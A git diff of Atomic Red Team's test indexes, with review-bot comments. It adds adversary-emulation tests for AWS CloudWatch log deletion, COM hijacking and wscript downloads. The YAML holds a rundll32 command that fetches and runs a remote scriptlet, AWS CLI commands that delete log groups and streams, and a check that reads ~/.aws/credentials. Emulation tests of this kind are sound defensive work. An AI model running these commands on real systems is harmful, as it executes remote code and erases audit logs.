diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 5b5e00cc..aa9702c5 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1,5 +1,5 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
@@ -359,6 +359,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2
defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
+defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -530,6 +532,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b
privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
@@ -755,6 +758,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4
persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
@@ -842,7 +846,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
-lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
+lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -1251,6 +1255,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1288,6 +1293,7 @@ impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70a
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
+impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index d2f57b64..d2195c8f 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -77,6 +77,8 @@ defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-2
defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Disable Cloud Logs,3,Office 365 - Exchange Audit Log Disabled,1ee572f3-056c-4632-a7fc-7e7c42b1543c,powershell
defense-evasion,T1562.008,Disable Cloud Logs,4,Disable CloudTrail Logging Through Event Selectors via Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
+defense-evasion,T1562.008,Disable Cloud Logs,5,AWS CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
+defense-evasion,T1562.008,Disable Cloud Logs,6,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c6268bef..f024778f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,5 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
@@ -394,6 +394,7 @@ privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,b
privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+privilege-escalation,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
@@ -551,6 +552,7 @@ persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4
persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1546.015,Component Object Model Hijacking,3,COM Hijacking with RunDLL32 (Local Server Switch),123520cc-e998-471b-a920-bd28e3feafa0,powershell
+persistence,T1546.015,Component Object Model Hijacking,4,COM hijacking via TreatAs,33eacead-f117-4863-8eb0-5c6304fbfaa9,powershell
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
@@ -602,7 +604,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell
lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
-lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
+lateral-movement,T1021.006,Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
@@ -907,6 +909,7 @@ command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Lin
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
@@ -929,6 +932,7 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
+impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index fdabd1a3..c5e4ac8c 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -527,6 +527,8 @@
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos]
+ - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws]
+ - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws]
- [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -841,6 +843,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1281,6 +1284,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -1463,7 +1467,7 @@
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- - Atomic Test #2: Invoke-Command [windows]
+ - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
@@ -2093,6 +2097,7 @@
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
+ - Atomic Test #26: Download a file using wscript [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -2214,6 +2219,7 @@
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
+ - Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 062a8e2b..6da30745 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -162,6 +162,8 @@
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: Disable CloudTrail Logging Through Event Selectors via Stratus [linux, macos]
+ - Atomic Test #5: AWS CloudWatch Log Group Deletes [iaas:aws]
+ - Atomic Test #6: AWS CloudWatch Log Stream Deletes [iaas:aws]
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a57d06c9..a2bcf3fa 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -630,6 +630,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -935,6 +936,7 @@
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
+ - Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -1058,7 +1060,7 @@
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1021.006 Windows Remote Management](../../T1021.006/T1021.006.md)
- Atomic Test #1: Enable Windows Remote Management [windows]
- - Atomic Test #2: Invoke-Command [windows]
+ - Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command [windows]
- Atomic Test #3: WinRM Access with Evil-WinRM [windows]
- [T1021.003 Distributed Component Object Model](../../T1021.003/T1021.003.md)
- Atomic Test #1: PowerShell Lateral Movement using MMC20 [windows]
@@ -1519,6 +1521,7 @@
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
+ - Atomic Test #26: Download a file using wscript [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
@@ -1581,6 +1584,7 @@
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
+ - Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 186b390a..122b1e3f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -240,7 +240,7 @@ defense-evasion:
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
- auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+ auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
description: 'Test execution of a remote script using rundll32.exe. Upon execution
notepad.exe will be opened.
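Review bot: Replacing the `auto_generated_guid` of an existing test (`cf3bdb9a-…` to `57ba4ce9-…`) silently invalidates anything keyed on the old value: runners that select tests by GUID, detection-validation records, and any external reference to this atomic; the CSV and Markdown indexes in this commit follow the change, outside references do not. If the intent is to mark the test as materially rewritten, the commit description should say so; otherwise the old GUID should be kept and only the executor changed. This index is presumably regenerated from the technique's own YAML, so the fix belongs there. The enclosing atomic_tests entry continues outside the hunk.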
@@ -253,7 +253,11 @@ defense-evasion:
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
executor:
- command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+ command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
+ ";document.write();GetObject("script:#{file_url}").Exec();
+
+ '
+ cleanup_command: 'taskkill /IM notepad.exe /f
'
name: command_prompt
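Review bot: The new `cleanup_command: 'taskkill /IM notepad.exe /f'` terminates every notepad.exe on the host, not only the instance the scriptlet spawns, and it does nothing about the rundll32.exe host that `start /b` now detaches from the executor. Because `start /b` returns immediately, cleanup may also run before the remote scriptlet has opened notepad at all, so the artifact can outlive the test. A narrower cleanup would track the processes the test itself creates rather than killing by image name; at minimum the test description should state that unrelated notepad windows will be closed. The test's description and input_arguments lie outside this hunk.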
@@ -15727,6 +15731,16 @@ defense-evasion:
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+ - description: 'PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+
+ '
+ prereq_command: 'if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1)
+ {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
executor:
command: |
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
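Review bot: The added dependency's `description` names `PPID.ps1` while the path it checks is `PPID-Spoof.ps1`; the two should agree. The `Test-Path`, `split-path` and `-OutFile` arguments are unquoted `$PathToAtomicsFolder\…` expansions, so a folder path containing a space splits into separate tokens and the prereq check fails while the download lands in the wrong place; the existing `#{dll_path}` dependency just above quotes its path. Suggested: `prereq_command: 'if (Test-Path "$PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1") {exit 0} else {exit 1}'` with the matching quotes in `get_prereq_command`. The same dependency is duplicated under privilege-escalation in the `@@ -34335,6 +34431,16 @@` hunk and needs the same fix; the executor continues outside the hunk.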
@@ -21512,6 +21526,88 @@ defense-evasion:
./stratus cleanup --all
name: sh
elevation_required: false
+ - name: AWS CloudWatch Log Group Deletes
+ auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
+ description: "Creates a new cloudWatch log group in AWS, Upon successful creation
+ it will Delete the group. Attackers can use this technique to evade defenses
+ by \ndeleting the log stream. Once it is deleted, the logs created by the
+ attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion\n"
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ cloudwatch_log_group_name:
+ description: Name of the cloudWatch log group
+ type: String
+ default: log-test
+ region:
+ description: Name of the region
+ type: String
+ default: us-east-1
+ dependencies:
+ - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+ '
+ prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+ '
+ get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+ defult profile using: aws configure
+
+ '
+ executor:
+ command: |
+ aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Created ***"
+ aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Deleted ***"
+ cleanup_command:
+ name: sh
+ elevation_required: false
+ - name: AWS CloudWatch Log Stream Deletes
+ auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
+ description: "Creates a new cloudWatch log stream in AWS, Upon successful creation
+ it will Delete the stream. Attackers can use this technique to evade defenses
+ by \ndeleting the log stream. Once it is deleted, the logs created by the
+ attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html\n"
+ supported_platforms:
+ - iaas:aws
+ input_arguments:
+ cloudwatch_log_group_name:
+ description: Name of the cloudWatch log group
+ type: String
+ default: test-logs
+ cloudwatch_log_stream_name:
+ description: Name of the cloudWatch log stream
+ type: String
+ default: '20150601'
+ region:
+ description: Name of the region
+ type: String
+ default: us-west-2
+ dependencies:
+ - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+ '
+ prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+ '
+ get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+ defult profile using: aws configure
+
+ '
+ executor:
+ command: |
+ aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Created ***"
+ aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+ echo "*** Log Stream Created ***"
+ aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
+ echo "*** Log Stream Deleted ***"
+ aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+ echo "*** Log Group Deleted ***"
+ cleanup_command:
